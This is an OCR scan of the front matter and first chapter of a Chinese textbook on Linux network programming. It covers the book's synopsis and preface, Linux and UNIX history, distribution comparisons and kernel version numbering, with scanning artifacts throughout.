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内 容 简 介 

本 书 是 获得 大 量 读者 好 评 的 “Linux 典藏 大 系 ” 中 的 《Linux 网 络 编程 》 的 第 2 版 。 本 书 第 1 版 出 版 
后 获得 了 读者 的 高 度 评 价 。 本 书 循 序 渐 进 ， 从 应 用 层 到 Linux 内 核 ， 从 基本 知识 点 到 综合 案例 ， 全 面 、 系 
统 地 向 读者 介绍 了 如 何在 Linux 下 进行 网 络 程序 设计 。 本 书 涉及 面 广 ,从 基本 的 编程 工具 介绍 和 编程 环境 
搭建 ， 到 高 级 技术 和 核心 原理 ， 再 到 项 目 实战 ， 几 乎 涉及 Linux 网 络 编程 的 所 有 重要 知识 。 

本 书 共 分 4 篇 。 第 1 篇 介绍 Linux 操作 系统 概述 、Linux 编程 环境 、 文 件 系统 简介 、 程 序 、 进 程 和 线 
程 ; 第 2 篇 介绍 TCP/IP 协议 族 简介 、 应 用 层 网 络 服务 程序 简介 、TCP 网 络 编程 基础 、 服 务 器 和 客户 端 信 
息 的 获取 、 数 据 的 IO 和 复 用 、 基 于 UDP 协议 的 接收 和 发 送 、 高 级 套 接 字 、 套 接 字 选 项 、 原 始 套 接 字 、 
服务 器 模型 选择 ， 以 及 IPv6 的 简介 ; 第 3 篇 介绍 Linux 内 核 中 网 络 部 分 结构 ， 以 及 分 布 和 netfilter 框架 内 
报 文 处 理 ; 第 4 篇 介绍 三 个 网 络 编程 的 实例 : “Web 服务 器 的 例子 SHTTPD、 网 络 协 议 栈 的 例子 SIP、 防 
火 墙 的 例子 SIPFW。 

本 书 适合 所 有 想 全 面 学 习 Linux 网 络 编程 的 人 员 阅读 , 也 适合 已 经 从 事 Linux 网 络 开发 的 工程 技术 人 
员 使 用 。 对 于 广大 的 Linux 平台 下 的 网 络 程序 设计 人 员 ， 本 书 更 是 一 本 不 可 多 得 的 参考 手册 。 
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了 路 


前 


Linux 操作 系统 已 经 成 为 目前 最 流行 的 开源 操作 系统 ， 在 服务 器 、 嵌 入 式 系统 有 着 广 
泛 的 应 用 ， 并 且 逐 步 走 入 个 人 电脑 的 桌面 操作 系统 。Linux 的 网 络 程序 设计 在 服务 器 领域 、 
嵌入 式 领 域 有 着 广泛 的 应 用 。 例 如 Web 服务 器 、P2P 应 用 、 嵌 入 式 网 络 机 顶 盒 、IPTV 机 
顶 盒 、 手 持 设 备 等 ， 上 述 产 品 大 部 分 采用 了 开源 的 Linux 系统 。 因 此 ， 熟 悉 并 且 能 够 编写 
网 络 程序 代码 ， 构 建 自己 的 网 络 架 构 程 序 是 十 分 重要 的 。 

本 书 是 获得 了 大 量 读者 好 评 的 “Linux 典藏 大 系 ” 中 的 《Linux 网 络 编程 》 的 第 2 版 。 
本 书 全 面 、 系 统 地 介绍 了 Linux 网 络 编程 技术 ， 其 中 通过 实例 重点 介绍 了 Linux 的 应 用 层 
网 络 设计 、 网 络 协议 栈 的 实现 原理 和 Linux 内 核 防火 墙 的 技术 。 学 完 本 书 之 后 ， 读 者 可 以 
有 编写 比较 复杂 项 目的 本 领 。 


关于 “Linux 典藏 大 系 ” 


“Linux 典藏 大 系 ” 是 清华 大 学 出 版 社 自 2010 年 1 月 以 来 陆续 推出 的 一 个 图 书 系列 ， 
截止 2013 年 1 月 ， 已 经 出 版 了 10 余 个 品种 。 该 系列 图 书 涵盖 了 Linux 技术 的 方方面面 ， 
可 以 满足 各 个 层次 和 各 个 领域 的 读者 学 习 Linux 技术 的 需求 。 该 系列 图 书 自 出 版 以 来 获得 
了 广大 读者 的 好 评 ， 已 经 成 为 Linux 图 书市 场 上 最 耀眼 的 明星 品牌 之 一 ， 其 销量 在 同类 图 
书 中 也 名 列 前 茅 ， 其 中 一 些 图 书 还 获得 了 “51CTO 读书 频道 ”颁发 的 “最 受 读者 喜爱 的 原 
创 IT 技术 图 书 奖 ”。 该 系列 图 书 出 版 过 程 中 也 得 到 了 国内 Linux 领域 最 知名 的 技术 社区 
ChinaUnix 〈 简 称 CU) 的 大 力 支持 和 帮助 ， 读 者 在 CU 社区 中 就 图 书 的 内 容 与 活跃 在 CU 
社区 中 的 Linux 技术 爱好 者 进行 广泛 交流 ， 将 会 取得 了 良好 的 学 习 效 果 。 


关于 本 书 第 2 版 


本 书 第 1 版 出 版 后 深 受 读者 好 评 ， 并 被 ChinaUNIX 技术 社区 所 推荐 。 但 是 随 着 Linux 
技术 的 发 展 ， 本 书 第 1 版 的 内 容 与 Linux 各 个 新 版 本 有 一 定 出 入 ， 这 给 读者 的 学 习 造 成 了 
一 些 不 便 。 应 广大 读者 的 要 求 ， 我 们 结合 Linux 技术 的 最 新 发 展 推出 第 2 版 图 书 。 相 比 第 
1 版， 第 2 版 图 书 在 内 容 上 的 变化 主要 体现 在 以 下 儿 个 方面 : 

(1) 操作 系统 环境 从 原 有 的 Debian 改 为 更 为 通用 的 Ubuntu。 

(2) Linux 内 核 介绍 增加 了 3.* 系 列 。 

(3) 对 IT 业界 的 动态 进行 了 更 新 。 

(4) 对 一 些 专 有 名 词 的 大 小 写 进 行 了 更 正 ， 如 VIM、Emacs。 

(5) 由 于 Vim 区 分 大 小 写 ， 尤 其 在 快捷 键 上 面 。 为 了 避免 读者 误 操 作 ， 所 以 对 原 有 的 
快捷 键 大 小 写 进行 了 重新 确认 ， 并 更 正 部 分 错误 的 大 小 写 。 

(6) 更 正 了 第 1 版 中 的 部 分 描述 错误 ， 如 Objective-C 。 
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(7) 对 GCC 软件 包 进 行 了 更 新 。 

(8) 为 了 便于 读者 阅读 和 使 用 代码 ， 对 于 完整 的 代码 增加 了 行 号 。 
(9) 更 正 了 部 分 调试 选项 的 大 小 写 错误 。 

(10) 对 部 分 Shell 命令 进行 了 更 新 ， 如 fdisk。 

(11) 对 Linux 涉及 的 硬件 信息 进行 了 更 新 ， 如 对 Ext4 的 支持 。 
(12) 对 需要 重点 注意 的 关键 代码 做 了 加 粗 。 

(13) 对 部 分 代码 缺少 的 库 文件 进行 了 补充 。 

(14) 修改 了 部 分 函数 库 的 包含 关系 。 

(15) 修改 了 部 分 变量 的 数据 类 型 。 

(16) 修改 了 部 分 代码 行 号 的 说 明 错 误 。 


本 书 的 特点 
1. 循序 渐进 ， 由 浅 入 深 


为 了 方便 读者 学 习 ， 本 书 首先 介绍 Linux 的 开发 环境 ， 然 后 介绍 基本 的 网 路 程序 设计 
方法 ， 再 进行 Linux 内 核 的 网 络 设计 方法 。 最 后 ， 通 过 3 个 综合 案例 ， 综 合 运用 上 述 知识 ， 
让 读者 更 深刻 地 了 解 网 络 程序 设计 的 知识 。 在 每 一 部 分 的 介绍 中 都 是 按照 由 浅 入 深 的 方式 
进行 介绍 ， 先 介绍 基础 知识 ， 再 结合 高 级 知识 进行 介绍 。 


2. 技术 全 面 ， 内 容 充实 

本 书 基 本 涵盖 了 Linux 网 络 程序 设计 的 所 有 知识 面 ， 特 别 对 于 高 级 网 络 编程 、 原 始 套 
接 字 等 高 级 应 用 层 网 络 程序 设计 给 出 了 全 面 的 介绍 和 丰富 的 例子 程序 。 除 了 用 户 界 面 的 网 
络 程序 设计 外 ， 本 书 还 对 内 核 空间 的 网 络 程序 设计 进行 了 详细 的 介绍 ， 针 对 netfilter 框架 ， 
做 了 很 细致 的 讲解 ， 并 给 出 了 一 个 全 面 使 用 netfilter 框架 的 案例 ， 以 方便 读者 深入 了 解 。 

3. 对 比 讲解 ， 理 解 深刻 

由 于 Linux 程序 设计 的 知识 用 于 空间 和 内 核 空间 的 代码 和 模块 是 相互 作用 的 ， 在 多 个 
主要 函数 介绍 过 程 中 ， 本 书 对 用 户 空间 和 内 核 空间 进行 交互 式 的 对 比 介 绍 ， 使 读者 在 了 解 
如 何 使 用 的 情况 下 ， 更 深入 地 了 解 为 什么 这 样 用 ， 所 谓 “ 知 其 然 并 知 其 所 以 然 ”。 

4. 案例 精 讲 ， 深 入 剖析 

根据 本 人 多 年 的 项 目 经 验 ， 只 有 实际 接触 案例 和 代码 才能 够 对 知识 点 更 深入 地 了 解 。 
本 书 在 介绍 了 Linux 网 络 程序 设计 知识 点 的 基础 上 ， 通 过 具有 典型 意义 的 3 个 案例 ， 对 各 
个 知识 点 包括 应 用 层 的 HTTP 协议 的 Web 服务 器 、 协议 栈 原理 的 协议 栈 案例 和 内 核 网 络 的 
防火 墙 案 例 进 行 了 深入 剖析 。 
本 书 内 容 及 体系 结构 

第 1 篇 Linux 网 络 开发 基础 〈 第 1~4 章 ) 

本 篇 主要 内 容 包 括 : Linux 操作 系统 概述 、Linux 编程 环境 、 文 件 系 统 简介 、 程 序 、 进 
程 和 线程 。 通 过 本 篇 的 学 习 ， 读 者 可 以 掌握 Linux 编程 的 基础 知识 ， 以 及 编程 环境 。 


.II。 


第 2 篇 Linux 用 户 层 网 络 编程 (第 5~15 章 ) 


本 篇 主要 内 容 包 括 : TCP/IP 协议 族 简 介 、 应 用 层 网 络 服 务 程序 简介 、TCP 网 络 编程 基 
础 、 服 务 器 和 客户 端 信息 的 获取 、 数 据 的 IO 和 复 用 、 基 于 UDP 协议 的 接收 和 发 送 、 高 级 
套 接 字 、 套 接 字 选项 、 原 始 套 接 字 、 服 务 器 模型 选择 、IPv6 简介 。 通 过 本 篇 的 学 习 ， 读 者 
可 以 掌握 Linux 网 络 编程 的 大 部 分 知识 。 


第 3 篇 Linux 内 核 网 络 编程 (第 16 章 和 第 17 章 ) 


本 篇 主要 内 容 包 括 : Linux 内 核 中 网 络 部 分 结构 , 以 及 分 布 和 netfilter 框架 内 报 文 处 理 。 
通过 本 篇 的 学 习 ， 读 者 可 以 初步 了 解 Linux 内 核 网 络 编程 的 知识 。 


第 4 篇 ”综合 案例 (第 18~20 章 ) 


本 篇 主要 内 容 包 括 : 一 个 简单 Web 服务 器 的 例子 SHTTPD、 一 个 简单 网 络 协 议 栈 的 例 
子 SIP、 一 个 简单 防火 墙 的 例子 SIPFW。 通 过 本 篇 的 学 习 ， 读 者 可 以 全 面 了 解 一 个 完整 可 
用 的 Linux 网 络 程序 是 如 何 编写 的 。 


本 书 学 习 建议 
口 建议 没有 基础 的 读者 ， 从 前 至 后 顺 次 阅读 ， 尽 量 不 要 跳跃 。 
口 书 中 的 实例 和 示例 建议 读者 都 要 亲自 上 机 动手 实践 ， 学 习 效果 会 更 好 。 
口 第 4 篇 的 内 容 偏重 于 实战 ， 这 部 分 内 容 在 初期 可 以 不 需要 全 面 掌 握 ， 只 要 理解 思 
想 即 可 ， 等 读者 有 了 较 多 开发 经 验 后 可 进一步 研读 。 


本 书 读者 对 象 


想 全 面 学 习 Linux 网 络 编程 的 人 员 ; 
Linux 网 络 编程 从 业 人 员 ， 

Linux 网 络 编程 爱好 者 ; 

大 中 专 院 校 的 学 生 ; 
社会 培训 班 的 学 员 ; 

需要 一 本 案头 必 备 手册 的 开发 人 员 。 


本 书 作者 


本 书 由 宋 敬 彬 主笔 编写 。 其 他 参与 编写 的 人 员 有 陈 超 、 陈 错 、 陈 佩 霞 、 陈 锐 、 黎 华 、 
李鹏 钦 、 李 森 、 李 奕 辉 、 李 玉 莉 、 刘 仲 义 、 卢 香 清 、 鲁 木 应 、 马 向 东 、 麦 廷 泳 、 米 永 刚 、 
欧阳 上 、 蔡 育 臣 、 冉 卫 华 、 宋 永 强 、 滕 科 平 、 王 秀丽 、 王 玉 芹 、 魏 莹 、 魏 宗 寿 、 温 本 利 。 

虽然 我 们 对 书 中 所 述 的 内 容 都 尽量 予以 核实 ， 并 多 次 进行 文字 校对 ， 但 可 能 还 存在 下 
漏 和 不 足 之 处 ， 奶 请 读者 批评 指正 。 
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第 1 章 Linux 操作 系统 概述 


Linux 操作 系统 是 目前 发 展 最 快 的 操作 系统 ， 自 1991 年 诞生 到 现在 的 二 十 多 年 间 ， 
Linux 逐步 完善 和 发 展 。Linux 操作 系统 在 服务 器 、 舱 入 式 等 方面 获得 了 长 足 的 发 展 ， 并 在 
个 人 操作 系统 方面 有 着 广 范 的 应 用 ， 这 主要 得 益 于 其 开放 性 。 本 章 将 对 Linux 的 发 展 进行 
介绍 ， 主 要 包括 如 下 内 容 
Linux 发 展 的 历史 ， 以 时 间 为 主线 对 Linux 的 诞生 进行 介绍 ; 

分 析 Linux 和 UNIX 操作 系统 的 异同 ; 
介绍 常用 的 几 种 Linux 发 行 版 本 的 特点 ; 
对 Linux 操作 系统 的 系统 架构 进行 简单 的 介绍 ; 

口 介绍 GNU 通用 公共 许可 证 及 其 特点 。 

通过 本 章 的 阅读 ， 读 者 可 以 对 Linux 的 发 展 历史 和 Linux 操作 系统 的 基本 特点 有 一 个 
简单 的 认识 。 


口 
口 
口 
口 


1.1 Linux 发 展 历史 


Linux 操作 系统 于 1991 年 诞生 ， 目 前 已 经 成 为 主流 的 操作 系统 之 一 。 其 版 本 从 开始 的 
0.01 版 本 到 目前 的 3.9.4 版 本 经 历 了 二 十 多 年 的 发 展 ， 从 最 初 的 蹦 中 学 步 的 “婴儿 ”成 长 
为 目前 在 服务 器 、 舱 入 式 系统 和 个 人 计算 机 等 多 个 方面 得 到 广泛 应 用 的 操作 系统 。 


1.1.1 Linux 的 诞生 和 发 展 


Linux 的 诞生 和 发 展 与 个 人 计算 机 的 发 展 历程 是 紧密 相关 的 ， 特 别 是 随 着 Intel 的 1386 
个 人 计算 机 的 发 展 而 逐步 成 熟 。 在 1981 年 之 前 没有 个 人 计算 机 , 计算 机 是 大 型 企业 和 政府 
部 门 才 能 使 用 的 昂贵 设备 。IBM 公司 在 1981 年 推出 了 个 人 计算 机 IBM PC， 从 而 造成 个 人 
计算 机 的 发 展 和 普及 。 刚 开始 的 时 候 ， 微 软 帮助 IBM 公司 开发 的 MS-DOS 操作 系统 在 个 
人 计算 机 中 占有 统治 地 位 。 随 着 IT 行业 的 发 展 ， 个 人 计算 机 的 硬件 价格 虽然 逐年 在 下 降 
但 是 软件 特别 是 操作 系统 的 价格 一 直 居 高 不 下 。 

与 个 人 计算 机 对 应 ， 在 大 型 机 上 的 主流 操作 系统 是 UNIX， 而 UNIX 操作 系统 对 操作 
系统 的 发 展 有 诸多 障碍 : 

口 UNIX 的 经 销 商 为 了 寻求 高 利率 ,将 价格 抬 得 很 高 , 个 人 计算 机 的 用 户 根本 不 可 能 

靠近 它 ， 不 利于 操作 系统 的 普及 。 

口 UNIX 操作 系统 的 源 代 码 具 有 版 权 , 虽然 贝尔 实验 室 许可 可 以 在 大 学 的 教学 中 使 用 

UNIX 源 代 码 ， 但 是 因为 版 权 问题 源 代码 一 直 不 能 公开 。 对 于 广大 的 PC 用 户 ， 软 
件 行业 的 供应 商 一 直 没 有 一 个 很 好 的 办 法 来 解决 UNIX 操作 系统 普及 性 问题 的 
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在 操作 系统 的 发 展 受到 版 权限 制 的 时 候 ， 出 现 了 Minix 操作 系统 ， 这 个 操作 系统 由 一 
本 书 来 详细 地 描述 它 的 实现 原理 。 由 于 书 中 对 Minux 操作 系统 的 描述 非常 详细 ， 并 且 很 有 
条 理性 ， 当 时 几乎 全 世界 的 计算 机 爱好 者 都 在 看 这 本 书 来 理解 操作 系统 的 原理 ， 其 中 包括 
Linux 系统 的 创始 者 Linus Torvalds。 


全 注意 : 当时 苹果 公司 的 Mac 系列 操作 系统 ,不 论 从 性 能 方面 还 是 从 用 户 的 易 用 性 方面 来 
说 都 是 最 好 的 ， 但 是 其 价格 也 是 最 高 的 。 


1.1.2 Linux 名 称 的 由 来 


Linux 操作 系统 的 名 称 最 初 并 没有 被 称 做 Linux。Linus 给 他 的 操作 系统 取 的 名 字 是 
Freax， 这 个 单词 的 含义 是 怪诞 的 、 怪 物 、 异 想 天 开 的 意思 。 当 Torvalds 将 他 的 操作 系统 上 
传 到 服务 器 ftp.funet.fi 上 的 时 候 , 这 个 服务 器 的 管理 员 Ari Lemke 对 Freax 这 个 名 称 很 不 赞 
成 ,所 以 将 操作 系统 的 名 称 改 为 了 Linus 的 谐音 Linux, 于 是 这 个 操作 系统 的 名 称 就 以 Linux 
流传 下 来 。 

在 Linus 的 自传 《Just for Fun》 一 书 中 , Linus 解释 说 :“Ari Lemke, 他 十 分 不 喜欢 Freax 
这 个 名 字 。 倒 喜欢 我 当时 正在 使 用 的 另 一 个 名 字 Linux， 并 把 我 的 邮件 路 径 命名 为 pub 
OS/Linux。 我 承认 我 并 没有 太 坚 持 ， 但 这 一 切 都 是 他 搞 的 ， 所 以 我 既 可 以 不 恬 愧 地 说 自己 
不 是 那么 以 个 人 为 中 心 ， 但 是 也 有 一 点 个 人 的 荣誉 感 。 而 且 个 人 认为 ，Linux 是 个 不 错 的 
名 字 。” 实 际 上 ， 在 早期 的 源 文件 中 仍然 使 用 Freax 作为 操作 系统 的 名 字 ， 可 以 从 Makefile 
文件 中 看 出 此 名 称 的 一 些 蛛丝马迹 。 

关于 Linux 的 发 音 有 各 种 说 法 ， 例 如 [TinAks]， 但 是 按照 Torvalds 的 说 法 ，Linux 中 Li 
中 ji 的 发 音 类 似 于 Minix 中 1i 的 发 音 , 而 nux 中 心 的 发 音 类 似 于 英文 单词 pronounce 中 第 一 
个 o 的 发 音 。 根 据 Torvalds 对 此 的 解释 ， 依 照 国 际 音标 其 发 音 为 [lin3ks]， 与 “ 嘿 呐 科斯 ” 
类 似 。 在 网 络 上 有 一 份 Torvalds 本 人 说 话 的 音频 ， 音 频 中 的 内 容 为 “Hello, this is Linus 
Torvalds, and I pronounce Linux as Linux”， 其 下 载 网 络 地 址 为 http://www.paul.sladen.org/ 
pronunciation/torvalds-says-linux.wav。 

对 于 Linux 发 音 的 解释 ， 还 有 一 份 Torvalds 本 人 的 解说 片段 ， 这 一 片段 发 音 的 视频 可 
以 从 如 下 的 URL 下 载 : http://www.Linuxweblog.com/Linux-pronunciation。 


1.2 Linux 的 发 展 要 素 


Linux 操作 系统 是 UNIX 的 一 种 典型 的 克隆 系统 。 在 Linux 诞生 之 后 ， 借 助 于 Internet 
网 络 , 在 全 世界 计算 机 爱好 者 的 共同 努力 下 , 成 为 目前 世界 上 使 用 者 最 多 的 一 种 类 似 UNIX 
的 操作 系统 。 在 Linux 操作 系统 的 诞生 、 成 长 和 发 展 过 程 中 ， 以 下 5 个 方面 起 到 了 重要 的 
作用 : UNIX 操作 系统 、Minix 操作 系统 、GNU 计划 、POSIX 标准 和 Internet 网 络 。 


1.2.1 UNIX 操作 系统 


UNIX 操作 系统 于 1969 年 在 Bell 实验 室 诞生 ， 它 是 美国 贝尔 实验 室 的 Ken.Thompson 
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和 Dennis Ritchie 在 DEC PDP-7 小 型 计算 机 系统 上 开发 的 一 种 分 时 操作 系统 。 

Ken Thompson 开发 UNIX 操作 系统 的 初衷 是 为 了 能 在 一 台 闲 置 的 PDP-7 计算 机 上 运 
行星 际 旅行 游戏 。 他 在 1969 年 夏天 花费 一 个 月 的 时 间 开 发 出 了 UNIX 操作 系统 的 原型 。 最 
开始 ,开发 UNIX 操作 系统 使 用 的 是 BCPL 语言 ( 即 通常 所 说 的 B 语 言 ), 后 来 Dennis Ritchie 
于 1972 年 使 用 C 语言 对 UNIX 操作 系统 进行 了 改写 。 同 时 UNIX 操作 系统 在 大 学 中 得 到 
广泛 的 推广 ， 并 将 UNIX 的 授权 分 发 给 多 个 商业 公司 。 

自从 UNIX 操作 系统 从 实验 室 走出 来 之 后 ， 得 到 了 长 足 的 发 展 。 目 前 已 经 成 为 大 型 系 
统 的 主流 操作 系统 , 现在 几乎 每 个 主要 的 计算 机 厂商 都 有 其 自 有 版 本 的 UNIX。UNIX 是 一 
个 功能 强大 、 性 能 全 面 的 、 多 用 户 、 多 任务 的 分 时 操作 系统 ， 在 从 巨型 计算 机 到 普通 PC 
等 多 种 不 同 的 平台 上 ， 都 有 着 十 分 广泛 的 应 用 。 

通常 情况 下 ， 比 较 大 型 的 系统 应 用 ， 例 如 银行 和 电信 部 门 ， 一 般 都 采用 固定 机 型 的 
UNIX 解决 方案 : 在 电信 系统 中 以 SUN (SUN 公司 已 经 被 Oracle 公司 收购 ) 的 UNIX 系统 
方案 居多 ， 在 民航 里 以 HP 的 系统 方案 居多 ， 在 银行 里 以 IBM 的 系统 方案 居多 。 

Linux 是 一 种 UNIX 的 克隆 系统 ， 采 用 了 几乎 一 致 的 系统 API 接口 。 特 别 是 网 络 方面 ， 
二 者 接口 的 应 用 程序 几乎 完全 一 致 。 


1.2.2 ”Minix 操作 系统 


Minix 操作 系统 也 是 UNIX 操作 系统 的 一 种 克隆 系统 ， 它 由 荷兰 Amsterdam 的 Vrije 
大 学 著名 教授 Andrew S.Tanenbaum 于 1987 年 开发 完成 。Minux 操作 系统 主要 用 于 学 生 学 
习 操 作 系统 原理 时 的 教学 。 在 当时 Minix 操作 系统 在 大 学 中 是 免费 使 用 的 ， 但 是 其 他 用 途 
则 需要 收费 。 目前 Minix 操作 系统 已 经 全 部 是 免费 的 , 可 以 从 许多 FTP 上 下 载 , 目前 Minix 
3 是 主流 版 本 。 

由 于 Minix 操作 系统 提供 源 代码 ， 并 且 与 操作 系统 相 结 合 ， 有 一 本 高 质量 的 书籍 介绍 
其 实现 原理 , 在 当时 全 世界 的 大 学 中 形成 了 学 习 Minix 操作 系统 的 风气 , Linus 刚 开始 就 是 
参照 此 系统 在 1991 年 开始 开发 Linux 的 。 

实际 上 ，Minix 操作 系统 并 不 是 很 优秀 ， 但 是 这 个 操作 系统 提供 了 C 语言 和 汇编 语言 
的 源 代 码 。 而 当时 的 UNIX 操作 系统 源 代 码 除 了 极 少 的 范围 外 一 直 是 保密 的 ，Minix 操作 
系统 对 程序 员 来 说 是 一 个 福音 。 为 了 可 以 让 学 生 在 一 个 学 期 内 能 够 学 完 操作 系统 的 课程 ， 
AST 保持 了 Minix 操作 系统 的 小 型 化 ， 没 有 接受 各 界 对 Minix 扩展 的 要 求 ， 而 正 是 这 个 原 
因 激 发 了 Linus 编写 Linux 操作 系统 。 


1.2.3 POSIX 标准 


POSIX (Portable Operating System Interface for Computing Systems) 是 由 IEEE 和 
ISO/IEC 开发 的 一 套 标准 。POSIX 标准 是 对 UNIX 操作 系统 的 经 验 和 实践 的 总 结 ， 对 操作 
系统 调用 的 服务 接口 进行 了 标准 化 ， 保 证 所 编制 的 应 用 程序 在 源 代码 一 级 可 以 在 多 种 操作 
系统 上 进行 移植 。 

在 20 世纪 90 年 代 初 ，POSIX 标准 的 制定 处 于 最 后 确定 的 投票 阶段 ， 而 Linux 正 处 于 
开始 的 诞生 时 期 。 作 为 一 个 指导 性 的 纲领 性 标准 ，Linux 的 接口 与 POSIX 相 兼 容 。 
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1.3 Linux 与 UNIX 的 异同 


Linux 是 UNIX 操作 系统 的 一 个 克隆 系统 ， 没 有 UNIX 就 没有 Linux。 但 是 ，Linux 和 
传统 的 UNIX 有 很 大 的 不 同 ， 两 者 之 间 的 最 大 区 别 是 关于 版 权 方面 的 : Linux 是 开放 源 代 
码 的 自由 软件 ， 而 UNIX 是 对 源 代 码 实行 知识 产权 保护 的 传统 商业 软件 。 两 者 之 间 还 存在 


如 下 的 区 别 : 

口 UNIX 操作 系统 大 多 数 是 与 硬件 配套 的 ,操作 系统 与 硬件 进行 了 绑 定 ; 而 Linux 则 
可 运行 在 多 种 硬件 平台 上 。 

口 _ UNIX 操作 系统 是 一 种 商业 软件 (授权 费 大 约 为 5 万 美元 ); 而 Linux 操作 提供 则 
是 一 种 自由 软件 ， 是 免费 的 ， 并 且 公 开源 代码 。 

口 UNIX 的 历史 要 比 Linux 悠久 , 但 是 Linux 操作 系统 由 于 吸取 了 其 他 操作 系统 的 经 
验 ， 其 设计 思想 虽然 源 于 UNIX 但 是 要 优 于 UNIX。 

口 虽然 UNIX 和 Linux 都 是 操作 系统 的 名 称 ， 但 UNIX 除了 是 一 种 操作 系统 的 名 称 
外 ， 作 为 商标 ， 它 归 SCO 所 有 。 

口 Linux 的 商业 化 版 本 有 Red Hat Linux、SuSe Linux、slakeware Linux、 国 内 的 红旗 


Linux 等 ， 还 有 Turbo Linux; UNIX 主要 有 Oracle 的 Solaris，IBM 的 AIX，HP 的 
HP-UX， 以 及 基于 x86 平台 的 SCO UNIX/UNIXware。 

Linux 操作 系统 的 内 核 是 免费 的 ， 而 UNIX 的 内 核 并 不 公开 。 

在 对 硬件 的 要 求 上 ，Linux 操作 系统 要 比 UNIX 要 求 低 ， 并 且 没 有 UNIX 对 硬件 要 
求 的 那么 苛刻 ， 在 对 系统 的 安装 难 易 度 上 ，Linux 比 UNIX 容易 得 多 ; 在 使 用 上 ， 
Linux 相对 没有 UNIX 那么 复杂 。 


总 体 来 说 ，Linux 操作 系统 无 论 在 外 观 上 还 是 在 性 能 上 都 与 UNIX 相同 或 者 比 UNIX 
更 好 ， 但 是 Linux 操作 系统 不 同 于 UNIX 的 源 代码 。 在 功能 上 ，Linux 仿制 了 UNIX 的 一 
部 分 ， 与 UNIX 的 System V 和 BSD UNIX 相 兼 容 。 在 UNIX 上 可 以 运行 的 源 代码 ， 一 般 
情况 下 在 Linux 上 重新 进行 编译 后 就 可 以 运行 ， 甚 至 BSD UNIX 的 执行 文件 可 以 在 Linux 
操作 系统 上 直接 运行 。 


1.4 操作 系统 类 型 选择 和 内 核 版 本 的 选择 


要 在 Linux 环境 下 进行 程序 设计 ， 首 先 要 选择 一 款 适合 自己 的 Linux 操作 系统 。 本 节 
对 常用 的 发 行 版 本 和 Linux 内 核 进行 了 介绍 ， 并 简要 讲解 了 如 何 定制 自己 的 Linux 操作 


系统 。 
1.4.1 


常见 的 不 同 公司 发 行 的 Linux 异同 


Linux 的 发 行 版 本 众多 ， 曾 有 人 收集 过 超过 300 种 的 发 行 版 本 。 当 然 ， 不 能 在 本 书 中 
介绍 众多 的 发 行 版 特点 ， 这 超出 了 本 书 的 范围 。 本 小 节 将 对 最 常用 的 发 行 版 本 进行 简单 的 
介绍 ， 表 1.1 为 用 户 经 常 使 用 的 版 本 。 读 者 可 以 去 相关 网 址 查找 ， 选 择 适合 的 版 本 使 用 。 
本 书 所 使 用 的 Linux 为 Ubuntu。 
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表 1.1 常用 Linux 发 行 版 本 特点 
版 本 名 称 软件 包 管理 器 
Debian Linux | www.debian.org 开放 的 开发 模式 ， 并 且 易 于 进行 软件 包 升 级 | apt 


ed 拥有 数量 庞大 的 用 户 , 优秀 的 社区 技术 支持 ，| up2date 〈rpm) ， 
edora Core | www.redhat.com 并 且 有 许多 创新 Si 


CentOS 是 一 种 对 RHEL (Red Hat Enterprise 
Linux) 源 代码 再 编译 的 产物 ， 由 于 Linux 是 
开发 源 代码 的 操作 系统 ， 并 不 排斥 基于 源 代 
CS Wwwcentos.org 。 | 码 的 再 分 发 ，CentOS 就 是 将 商业 的 Linux 操 
作 系 统 RHEL 进行 源 代码 再 编译 后 分 发 ， 并 
在 RHEL 的 基础 上 修正 了 不 少 已 知 的 漏洞 


Ro YaST (rpm)， 第 
专 上 :系统 ， 次 件 包 管理 | 一 
SUSE Linux | www.suse.com 人 绽 ， 易 用 的 YaST 软件 包 管理 三 方 apt (rpm) 软 


件 库 (repository) 
操作 界面 友好 ， 使 用 图 形 配 置 工具 ， 有 庞大 
Mandriva wwwmandriva.com | 的 社区 进行 技术 支持 ， 支 持 NTFS 分 区 的 大 
小 变更 


| 可 以 直接 在 CD 上 运行 ， 具 有 优秀 的 硬件 检 
KNOPPIX | wwwimoppicom | 测 和 适 本 能力 可 作为 系统 的 急救 盘 使 用 
Gentoo Linux 高 度 的 可 定制 性 ， 使 用 手册 完整 portage 
Ubuntu 优秀 易 用 的 桌面 环境 ， 基 于 Debian 构建 


1.4.2 内核 版 本 的 选择 


内 核 是 Linux 操作 系统 的 最 重要 的 部 分 , 从 最 初 的 0.95 版 本 到 目前 的 3.9.4 版 本 ,Linux 
内 核 开发 经 过 了 20 多 年 的 时 间 ， 其 架构 已 经 十 分 稳定 。Linux 内 核 的 编号 采用 如 下 编号 
形式 : 

主 版 本 号 .次 版 本 号 . 主 补丁 号 .次 补丁 号 
说 明 : 在 2011 年 ，Linux Kernel 3.0 发 布 。 随 后 ， 一 系列 以 3 开头 的 内 核 版 本 被 发 布 更 新 。 


例如 2.6.34.14 各 数字 的 含义 如 下 : 
口 第 1 个 数字 (2) 是 主 版 本 号 ,表示 第 2 大 版 本 ; 
口 第 2 个 数字 (6) 是 次 版 本 号 ， 有 两 个 含义 : 既 表 示 是 Linux 内 核 大 版 本 的 第 6 个 
\ 版 本 ， 同 时 因为 6 是 偶数 表示 为 发 布 版 本 〈 奇 数 表 示 测 试 版 ) ; 

口 第 3 个 数字 (34) 是 主 版 本 补丁 号 ， 表 示 指 定 小 版 本 的 第 34 个 补丁 包 ; 

口 第 4 个 数字 (14) 是 次 版 本 补丁 号 ， 表 示 次 补丁 号 的 第 3 个 小 补丁 。 

在 安装 Linux 操作 系统 的 时 候 , 最 好 不 要 采用 发 行 版 本 号 中 的 小 版 本 号 是 奇数 的 内 核 ， 
因为 开发 中 的 版 本 没有 经 过 比较 完善 的 测试 ， 有 一 些 漏 洞 是 未 知 的 ， 有 可 能 造成 使 用 中 不 
必要 的 麻烦 。 


全 注意 ! Debian Linux 内 核 的 版 本 稍 有 不 同 ， 如 2.6.18-3， 可 以 发 现 多 了 一 组 数字 (3 ) ， 
该 数字 是 构建 号 。 每 个 构建 号 可 以 增加 少量 新 的 驱动 程序 或 缺陷 修复 。 
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Linux 内 核 版 本 的 开发 源 代码 树 目 前 比较 通用 的 是 2.6.xx 的 版 本 ， 当 然 ， 有 部 分 2.4 
的 版 本 仍 在 使 用 。 与 2.4 版 本 的 内 核 相 比 较 ，2.6 版 本 内 核 具有 如 下 优势 
口 支持 绝 大 多 数 的 嵌入 式 系统 ， 加 入 了 之 前 嵌入 式 系统 经 常 使 用 的 a Clinux 的 大 部 
